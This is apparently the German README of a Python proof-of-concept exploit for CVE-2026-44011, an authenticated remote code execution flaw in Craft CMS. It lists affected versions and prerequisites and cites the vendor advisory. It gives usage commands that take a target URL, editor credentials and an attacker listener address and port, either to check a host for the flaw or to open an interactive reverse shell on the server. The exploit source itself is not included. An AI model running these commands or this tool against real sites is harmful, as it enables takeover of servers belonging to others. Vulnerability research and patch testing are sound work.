
Authentifizierte Craft CMS RCE PoC für CVE-2026-44011
Dieses Python-Skript adaptiert den Angriff, der im Craft CMS Security Advisory beschrieben wird. Ein authentifizierter Craft-Benutzer kann einen anfälligen Konfigurationspfad für das Feld-Layout erreichen und den Server zur Ausführung von Befehlen veranlassen.
Betroffene Versionen sind Craft CMS >=4.0.0, <4.17.12 und >=5.0.0, <5.9.18.
Das Skript erfordert curl auf beiden Hosts. Es verwendet Bash auf dem Server. Python3 auf dem Server stellt ebenfalls ein interaktives PTY bereit; ohne dieses fällt die Shell auf eine einfache Verbindung zurück.
# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check
# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'
Craft CMS nennt @precicom-vincent-tl als Finder von CVE-2026-44011. Die Schwachstellendetails und das Beispiel-Payload sind im Craft CMS Advisory GHSA-qrgm-p9w5-rrfw veröffentlicht. Dieses Skript adaptiert die dort veröffentlichte Technik.